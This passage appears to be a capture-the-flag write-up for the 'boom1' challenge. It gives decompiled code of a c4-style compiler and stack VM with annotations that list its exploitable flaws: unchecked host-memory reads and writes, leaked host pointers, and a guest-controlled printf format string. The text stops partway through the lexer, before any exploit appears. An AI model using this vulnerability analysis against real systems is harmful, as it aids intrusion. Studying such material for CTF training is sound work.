boom1
Description:
nc 182.92.73.10 24573
Solution:
程序保护如下:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

(All mitigations are on: with Full RELRO the GOT is read-only after load, and with PIE every code and data address is randomised, so any memory corruption found in the interpreter below has to be paired with an information leak before it can be turned into control of execution.)
main 函数如下:
/*
 * Decompiled (IDA) entry point of the challenge binary.
 *
 * The program is a small C-subset compiler + stack VM: it reads a source
 * program from stdin, compiles it into a word-code text segment and then
 * interprets that text. The opcode numbering, the `aLeaImmJmpJsrBz_0`
 * mnemonic table (5-byte stride, printed with "%.4s") and the 72-byte
 * identifier records match Robert Swierczek's c4 ("C in four functions");
 * the mnemonics used in the comments below follow c4's naming. Only
 * "LEA IMM JMP JSR BZ" are visible in the table name here, the rest are
 * inferred from what each handler does.
 *
 * Globals (names are IDA's, meaning taken from how they are used here):
 *   s             - symbol area, 72-byte records (see layout below)
 *   qword_206088  - text area / emit pointer (`e` in c4); +8 per word
 *   qword_206068  - last-printed text pointer (`le`), used by sub_B70
 *   qword_206080  - data area / current data pointer
 *   buf           - lexer read pointer into the source (`p`)
 *   qword_2060A0  - start of current source line (`lp`)
 *   qword_206070  - current token (`tk`)
 *   qword_2060A8  - current token value (`ival`)
 *   qword_2060B8  - current identifier record (`id`)
 *   qword_206098  - current source line number (`line`)
 *   qword_206090  - local-slot counter base (`loc`)
 *   qword_206060  - when non-zero, print source/text and do not run
 *                   (c4's `src` flag; never set in the code visible here)
 *   qword_206058  - when non-zero, trace each executed instruction
 *                   (c4's `debug` flag; never set in the code visible here)
 *   qword_206010  - library-call budget, see opcodes 30-39 below
 *
 * Identifier record layout (byte offsets into a 72-byte entry):
 *   +0  token kind (133 = Id, 134..141 = keyword)
 *   +8  hash, +16 pointer to the name inside the source buffer
 *   +24 class: 128 enum constant, 129 function, 130 builtin,
 *              131 global, 132 local/parameter
 *   +32 type: 0 char, 1 int, +2 per pointer level
 *   +40 value: enum value / text address / opcode / data address / slot
 *   +48,+56,+64 saved class/type/value of a global shadowed by a local
 *
 * Token constants used here: 40 '(' 41 ')' 44 ',' 59 ';' 123 '{' 125 '}'
 *   128 Num, 133 Id, 134 Char, 136 Enum, 138 Int, 142 '=', 159 '*'
 *
 * Parameters: a1 = argc, a2 = argv, a3 = envp (unused).
 * Returns: the guest program's exit value, 0 in "print only" mode, or -1
 * on any allocation, read or parse error (parse errors in sub_3457 and
 * sub_16CB call exit(-1) instead).
 *
 * Security-relevant properties visible in this function:
 *   - None of the emit pointers (text, data, symbol table) is checked
 *     against the 0x40000-byte areas they were allocated with.
 *   - The VM loads/stores (opcodes 9-12) dereference whatever address the
 *     guest computed; the guest also receives real host pointers (argv on
 *     the VM stack, text/data/bp addresses), so it can read and write host
 *     memory without any bounds check.
 *   - The guest is limited to 100 executed instructions and to a single
 *     successful library call (opcodes 30-39).
 *
 * Note: trailing `v52, v53` arguments on printf calls are IDA artefacts of
 * register reuse, not real arguments.
 */
size_t __fastcall main(__int64 a1, char **a2, char **a3)
{
  size_t result; // rax
  void *v4; // rdi
  signed __int64 v5; // rax
  signed __int64 v6; // rax
  void *v7; // rsi
  __int64 v8; // rax
  __int64 v9; // rax
  signed __int64 *v10; // ST28_8
  signed __int64 *v11; // ST60_8
  signed __int64 *v12; // rax
  signed __int64 *v13; // rax
  signed __int64 *v14; // rax
  signed __int64 v15; // rax
  signed __int64 v16; // rax
  signed __int64 *v17; // ST28_8
  signed __int64 *v18; // rax
  signed __int64 *v19; // rax
  signed __int64 v20; // ST28_8
  signed __int64 **v21; // rax
  signed __int64 **v22; // rax
  signed __int64 *v23; // rax
  _BYTE *v24; // rax
  signed __int64 *v25; // rax
  signed __int64 *v26; // rax
  signed __int64 *v27; // rax
  signed __int64 *v28; // rax
  signed __int64 *v29; // rax
  signed __int64 *v30; // rax
  signed __int64 *v31; // rax
  signed __int64 *v32; // rax
  signed __int64 *v33; // rax
  signed __int64 *v34; // rax
  signed __int64 *v35; // rax
  signed __int64 *v36; // rax
  signed __int64 *v37; // rax
  signed __int64 *v38; // rax
  signed __int64 *v39; // rax
  signed __int64 *v40; // rax
  __int64 v41; // rax
  __int64 v42; // rax
  __int64 v43; // rax
  __int64 v44; // rax
  __int64 v45; // rax
  __int64 v46; // rax
  __int64 v47; // rax
  __int64 v48; // rax
  signed __int64 v49; // ST60_8
  __int64 v50; // rax
  __int64 v51; // rax
  char **v52; // [rsp+0h] [rbp-70h]   argv + 1 (passed to the guest main)
  signed __int64 v53; // [rsp+8h] [rbp-68h]   argc - 1 (passed to the guest main)
  _BOOL8 v54; // [rsp+10h] [rbp-60h]   base type of the current declaration: 1 = int, 0 = char
  __int64 v55; // [rsp+18h] [rbp-58h]   full type of a global (base + 2 per '*')
  signed __int64 v56; // [rsp+18h] [rbp-58h]   full type of a parameter
  __int64 v57; // [rsp+18h] [rbp-58h]   full type of a local
  signed __int64 *v58; // [rsp+20h] [rbp-50h]   VM program counter (pc)
  char *v59; // [rsp+28h] [rbp-48h]   VM stack area (0x40000 bytes, not zeroed)
  signed __int64 *v60; // [rsp+28h] [rbp-48h]   VM stack pointer (sp)
  signed __int64 *v61; // [rsp+30h] [rbp-40h]   VM base pointer (bp)
  signed __int64 v62; // [rsp+38h] [rbp-38h]   VM accumulator (a)
  __int64 v63; // [rsp+40h] [rbp-30h]   executed-instruction counter (cycle)
  signed __int64 v64; // [rsp+48h] [rbp-28h]
  signed __int64 v65; // [rsp+48h] [rbp-28h]
  ssize_t v66; // [rsp+48h] [rbp-28h]   bytes read from stdin
  __int64 v67; // [rsp+48h] [rbp-28h]   next enum constant value
  __int64 v68; // [rsp+48h] [rbp-28h]   parameter slot counter
  signed __int64 v69; // [rsp+48h] [rbp-28h]   local slot counter
  signed __int64 v70; // [rsp+48h] [rbp-28h]   current opcode
  __int64 v71; // [rsp+58h] [rbp-18h]   identifier record of "main"

  setbuf(stdout, 0LL);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  v53 = a1 - 1;
  v52 = a2 + 1;
  /* Four 0x40000-byte arenas: symbols, text, data, stack. Only the first
   * three are zeroed; the stack arena is used uninitialised. */
  s = malloc(0x40000uLL);
  if ( !s )
  {
    printf("could not malloc(%d) symbol area\n", 0x40000LL, v52, v53);
    return -1LL;
  }
  qword_206088 = malloc(0x40000uLL);
  qword_206068 = (__int64)qword_206088;
  if ( !qword_206088 )
  {
    printf("could not malloc(%d) text area\n", 0x40000LL, v52, v53);
    return -1LL;
  }
  qword_206080 = malloc(0x40000uLL);
  if ( !qword_206080 )
  {
    printf("could not malloc(%d) data area\n", 0x40000LL, v52, v53);
    return -1LL;
  }
  v59 = (char *)malloc(0x40000uLL);
  if ( !v59 )
  {
    printf("could not malloc(%d) stack area\n", 0x40000LL, v52, v53);
    return -1LL;
  }
  memset(s, 0, 0x40000uLL);
  memset(qword_206088, 0, 0x40000uLL);
  v4 = qword_206080;
  memset(qword_206080, 0, 0x40000uLL);
  /* Pre-populate the symbol table by lexing a fixed word list: the first
   * eight words become keywords 134..141 (char else enum if int return
   * sizeof while), the next eleven become builtins whose value is the
   * opcode 30..40 (open read write close puts malloc free printf memset
   * memcmp exit), "void" is aliased to the Char keyword, and the record
   * for "main" is remembered in v71 so it can be looked up after parsing. */
  buf = "char else enum if int return sizeof while open read write close puts malloc free printf memset memcmp exit void main";
  v64 = 134LL;
  while ( v64 <= 141 )
  {
    ((void (*)(void))sub_B70)();
    v5 = v64++;
    *(_QWORD *)qword_2060B8 = v5;
  }
  v65 = 30LL;
  while ( v65 <= 40 )
  {
    ((void (*)(void))sub_B70)();
    *(_QWORD *)(qword_2060B8 + 24) = 130LL;
    *(_QWORD *)(qword_2060B8 + 32) = 1LL;
    v6 = v65++;
    *(_QWORD *)(qword_2060B8 + 40) = v6;
  }
  sub_B70(v4, 0LL);
  *(_QWORD *)qword_2060B8 = 134LL;
  sub_B70(v4, 0LL);
  v71 = qword_2060B8;
  /* Source is read once from stdin into a 0x40000-byte buffer; the read is
   * capped at 0x3FFFF so the terminating NUL always fits. The identifier
   * names in the symbol table point straight into this buffer. */
  buf = malloc(0x40000uLL);
  qword_2060A0 = (__int64)buf;
  if ( !buf )
  {
    printf("could not malloc(%d) source area\n", 0x40000LL, v52, v53);
    return -1LL;
  }
  puts("I'm living...");
  v7 = buf;
  v66 = read(0, buf, 0x3FFFFuLL);
  if ( v66 <= 0 )
  {
    printf("read() returned %d\n", v66, v52, v53);
    return -1LL;
  }
  *((_BYTE *)buf + v66) = 0;
  qword_206098 = 1LL;
  sub_B70(0LL, v7);
  /* ---- Parse global declarations until the token stream is exhausted. ---- */
  while ( qword_206070 )
  {
    v54 = 1LL;
    switch ( qword_206070 )
    {
      case 138LL:
        /* "int" */
        sub_B70(0LL, v7);
        break;
      case 134LL:
        /* "char" (and "void", which shares the keyword code) */
        sub_B70(0LL, v7);
        v54 = 0LL;
        break;
      case 136LL:
        /* "enum [name] { id [= Num] , ... }" - each member becomes a class-128
         * constant of type int with an auto-incremented value. */
        sub_B70(0LL, v7);
        if ( qword_206070 != 123 )
          sub_B70(0LL, v7);
        if ( qword_206070 == 123 )
        {
          sub_B70(0LL, v7);
          v67 = 0LL;
          while ( 1 )
          {
            if ( qword_206070 == 125 )
            {
              sub_B70(0LL, v7);
              goto LABEL_90;
            }
            if ( qword_206070 != 133 )
            {
              printf("%d: bad enum identifier %d\n", qword_206098, qword_206070, v52, v53);
              return -1LL;
            }
            sub_B70(0LL, v7);
            if ( qword_206070 == 142 )
            {
              sub_B70(0LL, v7);
              if ( qword_206070 != 128 )
              {
                printf("%d: bad enum initializer\n", qword_206098, v52, v53);
                return -1LL;
              }
              v67 = qword_2060A8;
              sub_B70(0LL, v7);
            }
            *(_QWORD *)(qword_2060B8 + 24) = 128LL;
            *(_QWORD *)(qword_2060B8 + 32) = 1LL;
            v8 = v67++;
            *(_QWORD *)(qword_2060B8 + 40) = v8;
            if ( qword_206070 == 44 )
              sub_B70(0LL, v7);
          }
        }
        break;
    }
LABEL_90:
    /* Declarator list: `* ... name` followed by either a function body or
     * a global variable, separated by ',' and ended by ';' (or '}'). */
    while ( qword_206070 != 59 && qword_206070 != 125 )
    {
      v55 = v54;
      while ( qword_206070 == 159 )
      {
        sub_B70(0LL, v7);
        v55 += 2LL;
      }
      if ( qword_206070 != 133 )
      {
        printf("%d: bad global declaration\n", qword_206098, v52, v53);
        return -1LL;
      }
      if ( *(_QWORD *)(qword_2060B8 + 24) )
      {
        printf("%d: duplicate global definition\n", qword_206098, v52, v53);
        return -1LL;
      }
      sub_B70(0LL, v7);
      *(_QWORD *)(qword_2060B8 + 32) = v55;
      if ( qword_206070 == 40 )
      {
        /* Function definition: record class 129 and the address of the
         * next text word, then parse parameters (class 132, slots counted
         * up from 0), local declarations (slots counted up from params+1)
         * and the statement list. No check that the text area has room. */
        *(_QWORD *)(qword_2060B8 + 24) = 129LL;
        *(_QWORD *)(qword_2060B8 + 40) = (char *)qword_206088 + 8;
        sub_B70(0LL, v7);
        v68 = 0LL;
        while ( qword_206070 != 41 )
        {
          v56 = 1LL;
          if ( qword_206070 == 138 )
          {
            sub_B70(0LL, v7);
          }
          else if ( qword_206070 == 134 )
          {
            sub_B70(0LL, v7);
            v56 = 0LL;
          }
          while ( qword_206070 == 159 )
          {
            sub_B70(0LL, v7);
            v56 += 2LL;
          }
          if ( qword_206070 != 133 )
          {
            printf("%d: bad parameter declaration\n", qword_206098, v52, v53);
            return -1LL;
          }
          if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL )
          {
            printf("%d: duplicate parameter definition\n", qword_206098, v52, v53);
            return -1LL;
          }
          /* Shadow any global of the same name: save class/type/value
           * into +48/+56/+64 so they can be restored after the body. */
          *(_QWORD *)(qword_2060B8 + 48) = *(_QWORD *)(qword_2060B8 + 24);
          *(_QWORD *)(qword_2060B8 + 24) = 132LL;
          *(_QWORD *)(qword_2060B8 + 56) = *(_QWORD *)(qword_2060B8 + 32);
          *(_QWORD *)(qword_2060B8 + 32) = v56;
          *(_QWORD *)(qword_2060B8 + 64) = *(_QWORD *)(qword_2060B8 + 40);
          v9 = v68++;
          *(_QWORD *)(qword_2060B8 + 40) = v9;
          sub_B70(0LL, v7);
          if ( qword_206070 == 44 )
            sub_B70(0LL, v7);
        }
        sub_B70(0LL, v7);
        if ( qword_206070 != 123 )
        {
          printf("%d: bad function definition\n", qword_206098, v52, v53);
          return -1LL;
        }
        v69 = v68 + 1;
        qword_206090 = v69;
        sub_B70(0LL, v7);
        while ( qword_206070 == 138 || qword_206070 == 134 )
        {
          v54 = qword_206070 == 138;
          sub_B70(0LL, v7);
          while ( qword_206070 != 59 )
          {
            v57 = v54;
            while ( qword_206070 == 159 )
            {
              sub_B70(0LL, v7);
              v57 += 2LL;
            }
            if ( qword_206070 != 133 )
            {
              printf("%d: bad local declaration\n", qword_206098, v52, v53);
              return -1LL;
            }
            if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL )
            {
              printf("%d: duplicate local definition\n", qword_206098, v52, v53);
              return -1LL;
            }
            *(_QWORD *)(qword_2060B8 + 48) = *(_QWORD *)(qword_2060B8 + 24);
            *(_QWORD *)(qword_2060B8 + 24) = 132LL;
            *(_QWORD *)(qword_2060B8 + 56) = *(_QWORD *)(qword_2060B8 + 32);
            *(_QWORD *)(qword_2060B8 + 32) = v57;
            *(_QWORD *)(qword_2060B8 + 64) = *(_QWORD *)(qword_2060B8 + 40);
            *(_QWORD *)(qword_2060B8 + 40) = ++v69;
            sub_B70(0LL, v7);
            if ( qword_206070 == 44 )
              sub_B70(0LL, v7);
          }
          sub_B70(0LL, v7);
        }
        /* Emit ENT <number of local slots>, the statements, then LEV. */
        qword_206088 = (char *)qword_206088 + 8;
        *(_QWORD *)qword_206088 = 6LL;
        qword_206088 = (char *)qword_206088 + 8;
        *(_QWORD *)qword_206088 = v69 - qword_206090;
        while ( qword_206070 != 125 )
          sub_3457();
        qword_206088 = (char *)qword_206088 + 8;
        *(_QWORD *)qword_206088 = 8LL;
        /* Unwind the local scope: restore every shadowed record. */
        for ( qword_2060B8 = (__int64)s; *(_QWORD *)qword_2060B8; qword_2060B8 += 72LL )
        {
          if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL )
          {
            *(_QWORD *)(qword_2060B8 + 24) = *(_QWORD *)(qword_2060B8 + 48);
            *(_QWORD *)(qword_2060B8 + 32) = *(_QWORD *)(qword_2060B8 + 56);
            *(_QWORD *)(qword_2060B8 + 40) = *(_QWORD *)(qword_2060B8 + 64);
          }
        }
      }
      else
      {
        /* Global variable: class 131, 8 bytes carved from the data area
         * regardless of type; no check that the data area has room. */
        *(_QWORD *)(qword_2060B8 + 24) = 131LL;
        *(_QWORD *)(qword_2060B8 + 40) = qword_206080;
        qword_206080 = (char *)qword_206080 + 8;
      }
      if ( qword_206070 == 44 )
        sub_B70(0LL, v7);
    }
    sub_B70(0LL, v7);
  }
  /* ---- Run: pc starts at the text address stored for "main". ---- */
  v58 = *(signed __int64 **)(v71 + 40);
  if ( v58 )
  {
    if ( qword_206060 )
    {
      result = 0LL;
    }
    else
    {
      /* Initial VM stack (top of the stack arena, growing down):
       *   EXIT, PSH, argc, argv, <return address -> the PSH word>
       * so that when the guest main returns via LEV it lands on
       * "PSH; EXIT" and exits with its return value. Note that argv is a
       * real host pointer handed to the guest. */
      v10 = (signed __int64 *)(v59 + 0x40000);
      v61 = v10;
      --v10;
      *v10 = 40LL;
      --v10;
      *v10 = 13LL;
      v11 = v10;
      --v10;
      *v10 = v53;
      --v10;
      *v10 = (signed __int64)v52;
      v60 = v10 - 1;
      *v60 = (signed __int64)v11;
      v63 = 0LL;
      /*
       * Fetch/dispatch loop. IDA rendered c4's opcode `if / else if` chain
       * as 40 nested `while ( 1 )` loops. The innermost body fetches an
       * opcode and handles opcode 0; each enclosing level handles the next
       * opcode after an `if ( v70 != k ) break;` guard, so control reaches a
       * level only when every inner level rejected the opcode. After any
       * handler runs, its loop iterates and falls straight back into the
       * innermost fetch. Opcode 40 (EXIT) and anything unknown fall out of
       * the outermost loop. The loops are listed outermost first.
       */
      while ( 1 ) {   /* level handling op 39 MCMP */
      while ( 1 ) {   /* level handling op 38 MSET */
      while ( 1 ) {   /* level handling op 37 PRTF */
      while ( 1 ) {   /* level handling op 36 FREE */
      while ( 1 ) {   /* level handling op 35 MALC */
      while ( 1 ) {   /* level handling op 34 PUTS */
      while ( 1 ) {   /* level handling op 33 CLOS */
      while ( 1 ) {   /* level handling op 32 WRIT */
      while ( 1 ) {   /* level handling op 31 READ */
      while ( 1 ) {   /* level handling op 30 OPEN */
      while ( 1 ) {   /* level handling op 29 MOD */
      while ( 1 ) {   /* level handling op 28 DIV */
      while ( 1 ) {   /* level handling op 27 MUL */
      while ( 1 ) {   /* level handling op 26 SUB */
      while ( 1 ) {   /* level handling op 25 ADD */
      while ( 1 ) {   /* level handling op 24 SHR */
      while ( 1 ) {   /* level handling op 23 SHL */
      while ( 1 ) {   /* level handling op 22 GE */
      while ( 1 ) {   /* level handling op 21 LE */
      while ( 1 ) {   /* level handling op 20 GT */
      while ( 1 ) {   /* level handling op 19 LT */
      while ( 1 ) {   /* level handling op 18 NE */
      while ( 1 ) {   /* level handling op 17 EQ */
      while ( 1 ) {   /* level handling op 16 AND */
      while ( 1 ) {   /* level handling op 15 XOR */
      while ( 1 ) {   /* level handling op 14 OR */
      while ( 1 ) {   /* level handling op 13 PSH */
      while ( 1 ) {   /* level handling op 12 SC */
      while ( 1 ) {   /* level handling op 11 SI */
      while ( 1 ) {   /* level handling op 10 LC */
      while ( 1 ) {   /* level handling op 9 LI */
      while ( 1 ) {   /* level handling op 8 LEV */
      while ( 1 ) {   /* level handling op 7 ADJ */
      while ( 1 ) {   /* level handling op 6 ENT */
      while ( 1 ) {   /* level handling op 5 BNZ */
      while ( 1 ) {   /* level handling op 4 BZ */
      while ( 1 ) {   /* level handling op 3 JSR */
      while ( 1 ) {   /* level handling op 2 JMP */
      while ( 1 ) {   /* level handling op 1 IMM */
      while ( 1 ) {   /* innermost: fetch, cycle limit, trace, op 0 LEA */
        v12 = v58;
        ++v58;
        v70 = *v12;
        /* Hard instruction budget: the 101st fetched instruction aborts
         * the whole process, before it is executed. */
        if ( ++v63 > 100 )
        {
          puts("NOTALLOW");
          exit(0);
        }
        if ( qword_206058 )
        {
          /* Trace: opcodes 0..7 carry an immediate operand, printed too. */
          printf("%d> %.4s", v63, &aLeaImmJmpJsrBz_0[5 * v70], v52, v53);
          if ( v70 > 7 )
            putchar(10);
          else
            printf(" %d\n", *v58);
        }
        if ( v70 )
          break;
        /* op 0 LEA: a = bp + *pc++ (address of a local/parameter slot) */
        v13 = v58;
        ++v58;
        v62 = (signed __int64)&v61[*v13];
      }
      if ( v70 != 1 )
        break;
      /* op 1 IMM: a = *pc++ */
      v14 = v58;
      ++v58;
      v62 = *v14;
      }
      if ( v70 != 2 )
        break;
      /* op 2 JMP: pc = *pc */
      v58 = (signed __int64 *)*v58;
      }
      if ( v70 != 3 )
        break;
      /* op 3 JSR: push pc + 1; pc = *pc */
      --v60;
      *v60 = (signed __int64)(v58 + 1);
      v58 = (signed __int64 *)*v58;
      }
      if ( v70 != 4 )
        break;
      /* op 4 BZ: pc = a ? pc + 1 : *pc */
      if ( v62 )
        v15 = (signed __int64)(v58 + 1);
      else
        v15 = *v58;
      v58 = (signed __int64 *)v15;
      }
      if ( v70 != 5 )
        break;
      /* op 5 BNZ: pc = a ? *pc : pc + 1 */
      if ( v62 )
        v16 = *v58;
      else
        v16 = (signed __int64)(v58 + 1);
      v58 = (signed __int64 *)v16;
      }
      if ( v70 != 6 )
        break;
      /* op 6 ENT: push bp; bp = sp; sp -= *pc++ (no check against the
       * bottom of the stack arena) */
      v17 = v60 - 1;
      *v17 = (signed __int64)v61;
      v61 = v17;
      v18 = v58;
      ++v58;
      v60 = &v17[-*v18];
      }
      if ( v70 != 7 )
        break;
      /* op 7 ADJ: sp += *pc++ */
      v19 = v58;
      ++v58;
      v60 += *v19;
      }
      if ( v70 != 8 )
        break;
      /* op 8 LEV: sp = bp; bp = *sp++; pc = *sp++ - the return address is
       * taken from guest-writable stack memory */
      v20 = (signed __int64)(v61 + 1);
      v61 = (signed __int64 *)*v61;
      v21 = (signed __int64 **)v20;
      v60 = (signed __int64 *)(v20 + 8);
      v58 = *v21;
      }
      if ( v70 != 9 )
        break;
      /* op 9 LI: a = *(qword *)a - unchecked host-memory read */
      v62 = *(_QWORD *)v62;
      }
      if ( v70 != 10 )
        break;
      /* op 10 LC: a = *(char *)a (sign-extended) - unchecked read */
      v62 = *(char *)v62;
      }
      if ( v70 != 11 )
        break;
      /* op 11 SI: *(qword *)*sp++ = a - unchecked host-memory write */
      v22 = (signed __int64 **)v60;
      ++v60;
      **v22 = v62;
      }
      if ( v70 != 12 )
        break;
      /* op 12 SC: *(char *)*sp++ = a; a = the stored byte - unchecked write */
      v23 = v60;
      ++v60;
      v24 = (_BYTE *)*v23;
      *v24 = v62;
      v62 = (char)*v24;
      }
      if ( v70 != 13 )
        break;
      /* op 13 PSH: *--sp = a */
      --v60;
      *v60 = v62;
      }
      if ( v70 != 14 )
        break;
      /* ops 14..29: binary operators, a = *sp++ OP a */
      v25 = v60;
      ++v60;
      v62 |= *v25;
      }
      if ( v70 != 15 )
        break;
      v26 = v60;
      ++v60;
      v62 ^= *v26;
      }
      if ( v70 != 16 )
        break;
      v27 = v60;
      ++v60;
      v62 &= *v27;
      }
      if ( v70 != 17 )
        break;
      v28 = v60;
      ++v60;
      v62 = *v28 == v62;
      }
      if ( v70 != 18 )
        break;
      v29 = v60;
      ++v60;
      v62 = *v29 != v62;
      }
      if ( v70 != 19 )
        break;
      v30 = v60;
      ++v60;
      v62 = *v30 < v62;
      }
      if ( v70 != 20 )
        break;
      v31 = v60;
      ++v60;
      v62 = *v31 > v62;
      }
      if ( v70 != 21 )
        break;
      v32 = v60;
      ++v60;
      v62 = *v32 <= v62;
      }
      if ( v70 != 22 )
        break;
      v33 = v60;
      ++v60;
      v62 = *v33 >= v62;
      }
      if ( v70 != 23 )
        break;
      /* shift counts come from the guest; >= 64 is undefined behaviour */
      v34 = v60;
      ++v60;
      v62 = *v34 << v62;
      }
      if ( v70 != 24 )
        break;
      v35 = v60;
      ++v60;
      v62 = *v35 >> v62;
      }
      if ( v70 != 25 )
        break;
      v36 = v60;
      ++v60;
      v62 += *v36;
      }
      if ( v70 != 26 )
        break;
      v37 = v60;
      ++v60;
      v62 = *v37 - v62;
      }
      if ( v70 != 27 )
        break;
      v38 = v60;
      ++v60;
      v62 *= *v38;
      }
      if ( v70 != 28 )
        break;
      /* op 28 DIV: no zero check - a divisor of 0 raises SIGFPE in the host */
      v39 = v60;
      ++v60;
      v62 = *v39 / v62;
      }
      if ( v70 != 29 )
        break;
      /* op 29 MOD: same zero-divisor hazard as DIV */
      v40 = v60;
      ++v60;
      v62 = *v40 % v62;
      }
      if ( v70 != 30 )
        break;
      /* ops 30..39: library calls. Each one post-decrements qword_206010
       * and requires the value before the decrement to be exactly 1, so
       * across the whole run only one such call can succeed; the second
       * attempt sees 0 and aborts. The initial value of qword_206010 is
       * not visible here (presumably 1). Arguments are read from the VM
       * stack as raw host pointers/integers. */
      v41 = qword_206010--;
      if ( v41 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      v62 = open((const char *)v60[1], *v60, v52, v53);
      }
      if ( v70 != 31 )
        break;
      v42 = qword_206010--;
      if ( v42 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      v62 = read(v60[2], (void *)v60[1], *v60);
      }
      if ( v70 != 32 )
        break;
      v43 = qword_206010--;
      if ( v43 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      v62 = write(v60[2], (const void *)v60[1], *v60);
      }
      if ( v70 != 33 )
        break;
      v44 = qword_206010--;
      if ( v44 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      v62 = close(*v60);
      }
      if ( v70 != 34 )
        break;
      v45 = qword_206010--;
      if ( v45 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      puts((const char *)*v60);
      }
      if ( v70 != 35 )
        break;
      v46 = qword_206010--;
      if ( v46 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      v62 = (signed __int64)malloc(*v60);
      }
      if ( v70 != 36 )
        break;
      v47 = qword_206010--;
      if ( v47 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      free((void *)*v60);
      }
      if ( v70 != 37 )
        break;
      v48 = qword_206010--;
      if ( v48 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      /* op 37 PRTF: the operand of the following ADJ (pc[1]) gives the
       * argument count; the format string and up to five arguments are
       * taken from the VM stack. The format string is guest-controlled,
       * i.e. a non-literal printf format. */
      v49 = (signed __int64)&v60[v58[1]];
      v62 = printf(
              *(const char **)(v49 - 8),
              *(_QWORD *)(v49 - 16),
              *(_QWORD *)(v49 - 24),
              *(_QWORD *)(v49 - 32),
              *(_QWORD *)(v49 - 40),
              *(_QWORD *)(v49 - 48),
              v52,
              v53);
      }
      if ( v70 != 38 )
        break;
      v50 = qword_206010--;
      if ( v50 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      v62 = (signed __int64)memset((void *)v60[2], v60[1], *v60);
      }
      if ( v70 != 39 )
        break;
      v51 = qword_206010--;
      if ( v51 != 1 )
      {
        puts("NOTALLOW");
        exit(0);
      }
      v62 = memcmp((const void *)v60[2], (const void *)v60[1], *v60);
      }
      /* op 40 EXIT: the value on top of the VM stack becomes main's result */
      if ( v70 == 40 )
      {
        printf("exit(%d) cycle = %d\n", *v60, v63, v52, v53);
        result = *v60;
      }
      else
      {
        printf("unknown instruction = %d! cycle = %d\n", v70, v63, v52, v53);
        result = -1LL;
      }
    }
  }
  else
  {
    puts("main() not defined");
    result = -1LL;
  }
  return result;
}
sub_B70 函数如下:
/*
 * Lexer (c4's `next()`): advances the global read pointer `buf` past one
 * token and leaves the token kind in qword_206070 and, for numbers and
 * strings, the value in qword_2060A8. For identifiers it also sets
 * qword_2060B8 to the matching (or newly created) 72-byte symbol record.
 *
 * Returns the stack-canary XOR computed by IDA's __readfsqword() epilogue;
 * callers ignore the value.
 *
 * Token kinds produced here (numeric codes as used by the parser):
 *   0            end of input
 *   128          number literal (decimal, octal, hex) or char literal
 *   133          identifier (record's +0 field, or 134..141 for keywords)
 *   34           string literal, value = its address in the data area
 *   142 '='  149 '=='  150 '!='  151 '<'  152 '>'  153 '<='  154 '>='
 *   155 '<<' 156 '>>'  157 '+'   158 '-'  159 '*'  160 '/'   161 '%'
 *   162 '++' 163 '--'  164 '['   143 '?'  144 '||' 145 '&&'  146 '|'
 *   147 '^'  148 '&'
 *   '~' ';' '{' '}' '(' ')' ']' ',' ':' '!' return their own ASCII code.
 *
 * Security-relevant properties visible here:
 *   - New symbol records are appended until the first all-zero entry; the
 *     symbol area's 0x40000-byte size is never checked.
 *   - String literal bytes are copied into the data area with no bound.
 *   - An unterminated string/char literal stops at the NUL terminator and
 *     then still advances `buf` past it, so the lexer continues reading
 *     beyond the end of the source text.
 */
unsigned __int64 sub_B70()
{
  char *v0; // rax
  __int64 *v1; // rax
  char *v2; // rax
  signed __int64 v3; // rax
  char *v4; // rax
  char *v5; // rax
  char *v6; // rax
  _BYTE *v7; // rax
  char *s2; // [rsp+0h] [rbp-10h]   start of the identifier being scanned
  void *s2a; // [rsp+0h] [rbp-10h]   data-area address where a string starts
  unsigned __int64 v11; // [rsp+8h] [rbp-8h]   stack canary

  v11 = __readfsqword(0x28u);
  while ( 1 )
  {
    qword_206070 = *(char *)buf;
    if ( !qword_206070 )
      break;
    buf = (char *)buf + 1;
    if ( qword_206070 == 10 )
    {
      /* Newline: in "print source" mode dump the finished line together
       * with the text words emitted since the previous line. */
      if ( qword_206060 )
      {
        printf("%d: %.*s", qword_206098, (char *)buf - qword_2060A0, qword_2060A0);
        qword_2060A0 = (__int64)buf;
        while ( qword_206068 < (unsigned __int64)qword_206088 )
        {
          qword_206068 += 8LL;
          printf("%8.4s", &aLeaImmJmpJsrBz[5 * *(_QWORD *)qword_206068]);
          if ( *(_QWORD *)qword_206068 > 7LL )
          {
            putchar(10);
          }
          else
          {
            qword_206068 += 8LL;
            printf(" %d\n", *(_QWORD *)qword_206068);
          }
        }
      }
      ++qword_206098;
    }
    else if ( qword_206070 == 35 )
    {
      /* '#': skip the rest of the line (preprocessor lines are ignored). */
      while ( *(_BYTE *)buf && *(_BYTE *)buf != 10 )
        buf = (char *)buf + 1;
    }
    else
    {
      if ( qword_206070 > 96 && qword_206070 <= 122 || qword_206070 > 64 && qword_206070 <= 90 || qword_206070 == 95 )
      {
        /* Identifier: hash = ((c0*147 + c1)*147 + ...) << 6 + length, then
         * linear search of the symbol table on hash + name bytes. */
        s2 = (char *)buf - 1;
        while ( *(_BYTE *)buf > 96 && *(_BYTE *)buf <= 122 || *(_BYTE *)buf > 64 && *(_BYTE *)buf <= 90 || *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 57 || *(_BYTE *)buf == 95 )
        {
          v0 = (char *)buf;
          buf = (char *)buf + 1;
          qword_206070 = 147 * qword_206070 + *v0;
        }
        qword_206070 = (qword_206070 << 6) + (_BYTE *)buf - s2;
        for ( qword_2060B8 = (__int64)s; *(_QWORD *)qword_2060B8; qword_2060B8 += 72LL )
        {
          if ( *(_QWORD *)(qword_2060B8 + 8) == qword_206070 && !memcmp(*(const void **)(qword_2060B8 + 16), s2, (_BYTE *)buf - s2) )
          {
            qword_206070 = *(_QWORD *)qword_2060B8;
